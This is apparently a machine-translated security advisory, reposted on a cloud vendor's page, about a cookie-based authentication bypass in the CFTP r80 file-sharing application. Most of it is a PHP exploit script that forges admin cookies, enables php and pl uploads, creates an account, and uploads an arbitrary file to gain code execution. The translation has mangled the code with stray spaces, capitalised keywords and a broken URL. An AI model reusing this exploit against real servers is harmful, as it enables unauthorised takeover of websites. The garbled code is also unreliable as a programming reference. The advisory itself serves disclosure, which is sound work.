Release date:
Updated on:
Affected Systems:
CFTP clients-oriented-ftp r80
Description:
--------------------------------------------------------------------------------
Bugtraq id: 48931
CFTP is a PHP-based file exchange application.
CFTP has the Authentication Bypass Vulnerability in Cookie authentication. Remote attackers can exploit this vulnerability to obtain the administrator access permissions of affected applications.
<* Source: Simon Leblanc
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<? Php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: levivity (vulnerability discovered by Simon Leblanc: # Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux
// Vulnerable URL
$ Url = 'HTTP: // [url domain]/cFTP /';
// The file to upload
$ Filename = dirname (_ FILE _). '/info. php ';
$ Failext = array ('php', 'pl ');
$ Username = 'hackname'. rand (0, 999999 );
$ Cookies_injection = 'Access = admin; userlevel = 9'; // <-- the big error of this app :-)
/**
* Call URL
*/
Function curl_call_url ($ url, $ cookies_injection, $ inputs = null)
{
$ Curl = curl_init ();
Curl_setopt ($ curl, CURLOPT_URL, $ url );
Curl_setopt ($ curl, CURLOPT_HEADER, false );
Curl_setopt ($ curl, CURLOPT_POST, true );
Curl_setopt ($ curl, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ curl, CURLOPT_FOLLOWLOCATION, true );
Curl_setopt ($ curl, CURLOPT_COOKIE, $ cookies_injection );
If (is_array ($ inputs) === true ){
Curl_setopt ($ curl, CURLOPT_POSTFIELDS, $ inputs );
}
$ Response = curl_exec ($ curl );
$ Headers = curl_getinfo ($ curl );
$ Error_number = curl_errno ($ curl );
$ Error_message = curl_error ($ curl );
Curl_close ($ curl );
Return array ($ response, $ headers, $ error_number, $ error_message );
}
// Add vulnerable extensions (php, pl: defined in $ failext)
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'Options. php', $ cookies_injection );
If (preg_match_all ('/<input ([^>] +) name = "([^"] +) "([^>] +) value = "([^"] +) ([^>] *)>/', $ response, $ matches )){
$ Input = array ();
$ Count = count ($ matches [0]);
For ($ I = 0; $ I <$ count; $ I ++ ){
$ Input [$ matches [2] [$ I] = $ matches [4] [$ I];
If ($ matches [2] [$ I] === 'allowed _ file_types '){
Foreach ($ failext as $ ext ){
If (strpos ($ matches [4] [$ I], $ ext) === false ){
$ Input [$ matches [2] [$ I]. = ','. $ ext;
}
}
$ Input [$ matches [2] [$ I] = str_replace (',', '|', $ input [$ matches [2] [$ I]);
}
}
// Add select
If (preg_match ('/<option selected = "selected" value = "([^"] +) "/', $ response, $ matches )){
$ Input ['timezone '] = $ matches [1];
} Else {
$ Input ['timezone '] = 'America/Argentina/Buenos_Aires ';
}
// Validate the form to add the vulnerables extensions
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'Options. php', $ cookies_injection, $ input );
If (strpos ($ response, 'message _ OK ')! = False ){
// Add new client: required to upload the file
$ Input = array (
'Add _ client_form_name '=> $ username,
'Add _ client_form_user '=> $ username,
'Add _ client_form_pass '=> 'hackname ',
'Add _ client_form_pass2 '=> 'hackname ',
'Add _ client_form_address '=> 'my address ',
'Add _ client_form_phone '=> '000-000-000 ',
// 'Add _ client_form_policy '=> '0 ',
'Add _ client_form_email '=> $ username.' @ example.com ',
'Add _ client_form_intcont '=> '',
'Submit '=> 'create account ',
);
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'clientform. php', $ cookies_injection, $ input );
If (strpos ($ response, 'message _ OK ')! = False ){
// Now upload file :-)
$ Input = array (
'Name' => 'my _ hack_file ',
'Description' => 'it \'s my hack file ',
'Clientname' => $ username,
'Ufile' => '@'. $ filename,
'Submit '=> 'upload ',
);
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. 'fileupload. php', $ cookies_injection, $ input );
If (preg_match ('# <a href = "([^"] +) "> File uploaded correctly #', $ response, $ matches )){
// Get filename
List ($ response, $ headers, $ error_number, $ error_message) = curl_call_url ($ url. $ matches [1], $ cookies_injection );
If (preg_match ('# <a href = "([^"] + )'. basename ($ filename ). '"target =" _ blank "#', $ response, $ matches_end )){
Echo 'Your file is here: '. $ url. $ matches [1]. $ matches_end [1]. basename ($ filename );
} Else {
Var_dump ($ response );
Echo 'fail to hack: where is the file !!! ';
}
} Else {
Var_dump ($ response );
Echo 'fail to hack: file not uploaded ';
}
} Else {
Var_dump ($ response );
Echo 'fail to hack: client not created ';
}
} Else {
Var_dump ($ response );
Echo 'fail to hack: options not changed ';
}
} Else {
Var_dump ($ response );
Echo 'fail to hack: no input ';
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
CFTP
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Https://code.google.com/p/clients-oriented-ftp/downloads/list
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
